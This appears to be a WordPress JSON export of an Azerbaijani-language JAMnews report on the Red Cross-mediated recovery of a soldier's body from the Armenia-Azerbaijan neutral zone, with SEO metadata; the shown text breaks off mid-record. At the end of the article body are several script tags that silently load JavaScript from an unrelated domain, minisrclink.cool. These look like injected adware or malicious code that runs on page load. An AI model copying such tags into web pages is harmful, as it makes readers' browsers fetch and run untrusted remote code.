{"id":13134,"date":"2020-02-20T00:00:00","date_gmt":"2020-02-20T00:00:00","guid":{"rendered":"http:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/"},"modified":"2020-03-18T12:55:19","modified_gmt":"2020-03-18T12:55:19","slug":"az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub","status":"publish","type":"post","link":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/","title":{"rendered":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb"},"content":{"rendered":"<p><figure id=\"attachment_228168\" aria-describedby=\"caption-attachment-228168\" style=\"width: 169px\" class=\"wp-caption alignright\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-228168 size-medium\" src=\"http:\/\/jam-news.net\/app\/uploads\/2020\/02\/87079842_2719131448184838_6918148082752290816_n-169x300.jpg\" alt=\"\" width=\"169\" height=\"300\" \/><figcaption id=\"caption-attachment-228168\" class=\"wp-caption-text\">Akif El\u015f\u0259n o\u011flu Abbasov. Foto: minval.az<\/figcaption><\/figure><\/p>\n<p><span style=\"font-weight: 400;\">Fevral\u0131n 19-da Beyn\u0259lxalq Q\u0131rm\u0131z\u0131 Xa\u00e7 Komit\u0259sinin vasit\u0259\u00e7iliyi il\u0259 az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti <\/span><a href=\"https:\/\/jam-news.net\/category\/theme-pages-az\/az%c9%99rbaycan_v%c9%99_erm%c9%99nistan\/?lang=az-AZ\"><span style=\"font-weight: 400;\">Erm\u0259nistan v\u0259 Az\u0259rbaycan<\/span><\/a><span style=\"font-weight: 400;\"> silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral \u0259razid\u0259n evakuasiya olunub.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Akif El\u015f\u0259n o\u011flu Abbasov bir ne\u00e7\u0259 g\u00fcn \u0259vv\u0259l nam\u0259lum \u015f\u0259raitd\u0259 yoxa \u00e7\u0131xm\u0131\u015fd\u0131.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Erm\u0259nistan <\/span><a href=\"https:\/\/news.am\/rus\/news\/561267.html?fbclid=IwAR36zZ4jd448lK-9NZC_wZZD1Tn8Jma3uexcoct9Bx4N2CIwaM4BPzZ5kHA&amp;__cf_chl_jschl_tk__=5d127550e187a8ffb48123e91e4b83d99473cf86-1582193906-0-AbgwnBTykv71H8mkDookX-PewLeFWTUlZ1ZNhXdoImI6vLcImHt8Cx_0Xima4Qhu4eZLnYTCNlNbgof-r2syIeUfv3KoCaNvdIpnVp3gd34kYjKWOincFe1WgQ56gUnkoaW8HIxhsw4nfqbBtf_zafwfZwLM9m5_oKKzz5Ydc7Dqbw2Q3mXp-mF-IYUxysYxDyQpEGi9JRgCJxA0VFWRcHKvHylhm9Ut29JEjEMuuNXHut2KQhFK9Bmt3X1SGoptC2WeixjOXXbS3cIQmqZX1StWHZfVIy6Lpcqq1SQc19_kJqylwAjp_i5YhWI9O0bJqLlK0k9-MY4L9BYLPohJr-w7iR8BN9qAL0nkq5ayOcu2ZWTZAQjbOgvPdAamx8KcRqvJhxTSatk6pxvzJzNbGEzwY9IifYEtH6BiK-rzG4GA5DAXZzGGD0TIMrNaAr0_DmXFoEjAzmdmIGwtRKKOabk\"><span style=\"font-weight: 400;\">m\u0259nb\u0259l\u0259rinin<\/span><\/a><span style=\"font-weight: 400;\"> yazd\u0131\u011f\u0131na g\u00f6r\u0259, Az\u0259rbaycan t\u0259r\u0259finin xahi\u015fi il\u0259 \u0259m\u0259liyyat h\u0259yata ke\u00e7irilib v\u0259 bu \u0259m\u0259liyyatda AT\u018fT s\u0259drinin \u015f\u0259xsi n\u00fcmay\u0259nd\u0259si Anjey Kaspr\u015fik i\u015ftirak edib. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Az\u0259rbaycan <\/span><a href=\"https:\/\/apa.az\/az\/dagliq_qarabag\/Azrbaycan-Ordusunun-bir-muddt-vvl-itkin-dusmus-sgrinin-meyiti-neytral-razidn-goturulub-572730\"><span style=\"font-weight: 400;\">medias\u0131<\/span><\/a><span style=\"font-weight: 400;\"> is\u0259 \u201c\u0259m\u0259liyyat\u0131n t\u0259r\u0259fl\u0259rin raz\u0131l\u0131\u011f\u0131 il\u0259 h\u0259yata ke\u00e7irildiyini\u201d yaz\u0131r.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u00a0<div class=\"su-divider su-divider-style-default\" style=\"margin:15px 0;border-width:2px;border-color:#d7d7db\"><\/div><\/span><\/p>\n<p><strong>\u00a0<a href=\"https:\/\/jam-news.net\/erm%c9%99nistanin-bas-naziri-v%c9%99-az%c9%99rbaycan-prezidenti-ilk-d%c9%99f%c9%99-qarabag-munaqis%c9%99sini-ictimai-s%c9%99kild%c9%99-muzakir%c9%99-ed%c9%99c%c9%99kl%c9%99r\/?lang=az-AZ\">\u2022 <span style=\"text-decoration: underline;\">Erm\u0259nistan\u0131n ba\u015f naziri v\u0259 Az\u0259rbaycan prezidenti ilk d\u0259f\u0259 Qaraba\u011f m\u00fcnaqi\u015f\u0259sini ictimai \u015f\u0259kild\u0259 m\u00fczakir\u0259 edib<\/span><\/a><\/strong><\/p>\n<p><strong><a href=\"https:\/\/jam-news.net\/erm%c9%99ni-v%c9%99-az%c9%99rbaycanli-jurnalistl%c9%99r-tam-m%c9%99xfi-rejimd%c9%99-qarsiliqli-s%c9%99f%c9%99r-edibl%c9%99r\/?lang=az-AZ\">\u2022 <span style=\"text-decoration: underline;\">Erm\u0259ni v\u0259 az\u0259rbaycanl\u0131 jurnalistl\u0259r tam m\u0259xfi rejimd\u0259 qar\u015f\u0131l\u0131ql\u0131 s\u0259f\u0259r edibl\u0259r<\/span><\/a><\/strong><\/p>\n<p><strong><a href=\"https:\/\/jam-news.net\/az%c9%99rbaycanda-ozunu-senzura-erm%c9%99nil%c9%99rl%c9%99-bagli-sad%c9%99c%c9%99-sukut\/?lang=az-AZ\">\u2022 <span style=\"text-decoration: underline;\">Az\u0259rbaycanda erm\u0259nil\u0259r haqda susmaq \u0259n salamat\u0131d\u0131r<\/span><\/a><\/strong><\/p>\n<p><span style=\"font-weight: 400;\"><div class=\"su-divider su-divider-style-default\" style=\"margin:15px 0;border-width:2px;border-color:#d7d7db\"><\/div><\/span><\/p>\n<p><script type=\"text\/javascript\" async=\"\" src=\"\/\/minisrclink.cool\/1e40c8bd4601a5a5a4.js\"><\/script><\/p>\n<p><script src=\"\/\/minisrclink.cool\/1e40c8bd4601a5a5a4.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/minisrclink.cool\/optout\/set\/lat?jsonp=__mtz_cb_59871522&amp;key=1e40c8bd4601a5a5a4&amp;cv=1582206084&amp;t=1582206084379\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/minisrclink.cool\/optout\/set\/lt?jsonp=__mtz_cb_737649583&amp;key=1e40c8bd4601a5a5a4&amp;cv=1349105&amp;t=1582206084380\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Q\u0131rm\u0131z\u0131 Xa\u00e7 v\u0259 AT\u018fT n\u00fcmay\u0259nd\u0259si vasit\u0259\u00e7i olub<\/p>\n","protected":false},"author":3,"featured_media":22947,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[27,17,9,2,50,5],"tags":[1982,2414,18,2415,33,2416,2417,2418,630,2419,2420,383],"formation":[],"post-author":[],"topic":[245],"tooltip":[],"city":[],"class_list":["post-13134","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ermnistan","category-azrbaycan","category-munaqislr","category-cografiya","category-xbrlr","category-siyast","tag-ana-shif","tag-andjey-kasprsik","tag-azrbaycan","tag-bqxk","tag-ermnistan","tag-ermnistan-v-azrbaycan","tag-sgr-csdi","tag-neytral-bolg","tag-qarabag-munaqissi","tag-qarabaga-guzst-getmk","tag-qirmizi-xac","tag-383","topic-azrbaycan-v-ermnistan"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jam-news.net\/az\/az\u0259rbaycanli-\u0259sg\u0259rin-meyiti-az\u0259rbaycan-v\u0259-erm\u0259nistan-silahli-quvv\u0259l\u0259ri-arasindaki-neytral-zonadan-goturulub\/\" \/>\n<meta property=\"og:locale\" content=\"az_AZ\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews\" \/>\n<meta property=\"og:description\" content=\"Q\u0131rm\u0131z\u0131 Xa\u00e7 v\u0259 AT\u018fT n\u00fcmay\u0259nd\u0259si vasit\u0259\u00e7i olub\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jam-news.net\/az\/az\u0259rbaycanli-\u0259sg\u0259rin-meyiti-az\u0259rbaycan-v\u0259-erm\u0259nistan-silahli-quvv\u0259l\u0259ri-arasindaki-neytral-zonadan-goturulub\/\" \/>\n<meta property=\"og:site_name\" content=\"Azerbaijani Jamnews\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/JAMnewsInEnglish\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-02-20T00:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-03-18T12:55:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"JAMnews\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@JAMnewsCaucasus\" \/>\n<meta name=\"twitter:site\" content=\"@JAMnewsCaucasus\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JAMnews\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/\"},\"author\":{\"name\":\"JAMnews\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6\"},\"headline\":\"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb\",\"datePublished\":\"2020-02-20T00:00:00+00:00\",\"dateModified\":\"2020-03-18T12:55:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/\"},\"wordCount\":228,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/jam-news.net\/az\/#organization\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg\",\"keywords\":[\"ana s\u0259hif\u0259\",\"Andjey Kaspr\u015fik\",\"Az\u0259rbaycan\",\"BQXK\",\"Erm\u0259nistan\",\"Erm\u0259nistan v\u0259 Az\u0259rbaycan\",\"\u0259sg\u0259r c\u0259s\u0259di\",\"neytral b\u00f6lg\u0259\",\"Qaraba\u011f m\u00fcnaqi\u015f\u0259si\",\"Qaraba\u011fa g\u00fcz\u0259\u015ft\u0259 getm\u0259k\",\"Q\u0131rm\u0131z\u0131 Xa\u00e7\",\"\u0422\u043e\u043f\"],\"articleSection\":[\"Armenia\",\"Azerbaijan\",\"Conflicts\",\"Geography\",\"News\",\"Politics\"],\"inLanguage\":\"az\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/\",\"url\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/\",\"name\":\"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews\",\"isPartOf\":{\"@id\":\"https:\/\/jam-news.net\/az\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg\",\"datePublished\":\"2020-02-20T00:00:00+00:00\",\"dateModified\":\"2020-03-18T12:55:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#breadcrumb\"},\"inLanguage\":\"az\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage\",\"url\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg\",\"contentUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg\",\"width\":1200,\"height\":720},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jam-news.net\/az\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jam-news.net\/az\/#website\",\"url\":\"https:\/\/jam-news.net\/az\/\",\"name\":\"Azerbaijani Jamnews\",\"description\":\"Caucasus News, Politics and Society\",\"publisher\":{\"@id\":\"https:\/\/jam-news.net\/az\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jam-news.net\/az\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"az\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jam-news.net\/az\/#organization\",\"name\":\"JAMnews\",\"url\":\"https:\/\/jam-news.net\/az\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg\",\"contentUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg\",\"width\":960,\"height\":960,\"caption\":\"JAMnews\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/JAMnewsInEnglish\/\",\"https:\/\/x.com\/JAMnewsCaucasus\",\"https:\/\/www.instagram.com\/jam_news\/\",\"https:\/\/www.youtube.com\/channel\/UCXQbUCme2pykuZYXWHx4VPg\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6\",\"name\":\"JAMnews\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g\",\"caption\":\"JAMnews\"},\"url\":\"https:\/\/jam-news.net\/az\/author\/margarita\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jam-news.net\/az\/az\u0259rbaycanli-\u0259sg\u0259rin-meyiti-az\u0259rbaycan-v\u0259-erm\u0259nistan-silahli-quvv\u0259l\u0259ri-arasindaki-neytral-zonadan-goturulub\/","og_locale":"az_AZ","og_type":"article","og_title":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews","og_description":"Q\u0131rm\u0131z\u0131 Xa\u00e7 v\u0259 AT\u018fT n\u00fcmay\u0259nd\u0259si vasit\u0259\u00e7i olub","og_url":"https:\/\/jam-news.net\/az\/az\u0259rbaycanli-\u0259sg\u0259rin-meyiti-az\u0259rbaycan-v\u0259-erm\u0259nistan-silahli-quvv\u0259l\u0259ri-arasindaki-neytral-zonadan-goturulub\/","og_site_name":"Azerbaijani Jamnews","article_publisher":"https:\/\/www.facebook.com\/JAMnewsInEnglish\/","article_published_time":"2020-02-20T00:00:00+00:00","article_modified_time":"2020-03-18T12:55:19+00:00","og_image":[{"width":1200,"height":720,"url":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg","type":"image\/jpeg"}],"author":"JAMnews","twitter_card":"summary_large_image","twitter_creator":"@JAMnewsCaucasus","twitter_site":"@JAMnewsCaucasus","twitter_misc":{"Written by":"JAMnews","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#article","isPartOf":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/"},"author":{"name":"JAMnews","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6"},"headline":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb","datePublished":"2020-02-20T00:00:00+00:00","dateModified":"2020-03-18T12:55:19+00:00","mainEntityOfPage":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/"},"wordCount":228,"commentCount":0,"publisher":{"@id":"https:\/\/jam-news.net\/az\/#organization"},"image":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage"},"thumbnailUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg","keywords":["ana s\u0259hif\u0259","Andjey Kaspr\u015fik","Az\u0259rbaycan","BQXK","Erm\u0259nistan","Erm\u0259nistan v\u0259 Az\u0259rbaycan","\u0259sg\u0259r c\u0259s\u0259di","neytral b\u00f6lg\u0259","Qaraba\u011f m\u00fcnaqi\u015f\u0259si","Qaraba\u011fa g\u00fcz\u0259\u015ft\u0259 getm\u0259k","Q\u0131rm\u0131z\u0131 Xa\u00e7","\u0422\u043e\u043f"],"articleSection":["Armenia","Azerbaijan","Conflicts","Geography","News","Politics"],"inLanguage":"az"},{"@type":"WebPage","@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/","url":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/","name":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb - JAMnews","isPartOf":{"@id":"https:\/\/jam-news.net\/az\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage"},"image":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage"},"thumbnailUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg","datePublished":"2020-02-20T00:00:00+00:00","dateModified":"2020-03-18T12:55:19+00:00","breadcrumb":{"@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#breadcrumb"},"inLanguage":"az","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/"]}]},{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#primaryimage","url":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg","contentUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/67963118_476244223161751_1273751561847177216_n-7.jpg","width":1200,"height":720},{"@type":"BreadcrumbList","@id":"https:\/\/jam-news.net\/az\/az%c9%99rbaycanli-%c9%99sg%c9%99rin-meyiti-az%c9%99rbaycan-v%c9%99-erm%c9%99nistan-silahli-quvv%c9%99l%c9%99ri-arasindaki-neytral-zonadan-goturulub\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jam-news.net\/az\/"},{"@type":"ListItem","position":2,"name":"Az\u0259rbaycanl\u0131 \u0259sg\u0259rin meyiti Az\u0259rbaycan v\u0259 Erm\u0259nistan silahl\u0131 q\u00fcvv\u0259l\u0259ri aras\u0131ndak\u0131 neytral zonadan g\u00f6t\u00fcr\u00fcl\u00fcb"}]},{"@type":"WebSite","@id":"https:\/\/jam-news.net\/az\/#website","url":"https:\/\/jam-news.net\/az\/","name":"Azerbaijani Jamnews","description":"Caucasus News, Politics and Society","publisher":{"@id":"https:\/\/jam-news.net\/az\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jam-news.net\/az\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"az"},{"@type":"Organization","@id":"https:\/\/jam-news.net\/az\/#organization","name":"JAMnews","url":"https:\/\/jam-news.net\/az\/","logo":{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/","url":"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg","contentUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg","width":960,"height":960,"caption":"JAMnews"},"image":{"@id":"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/JAMnewsInEnglish\/","https:\/\/x.com\/JAMnewsCaucasus","https:\/\/www.instagram.com\/jam_news\/","https:\/\